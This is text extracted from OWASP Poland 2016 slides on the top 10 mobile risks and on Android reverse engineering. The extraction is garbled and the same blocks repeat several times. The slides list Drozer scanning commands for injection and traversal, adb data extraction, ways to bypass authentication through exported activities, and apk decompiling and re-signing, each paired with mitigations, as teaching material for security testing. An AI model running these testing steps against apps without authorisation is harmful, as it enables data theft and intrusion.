bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
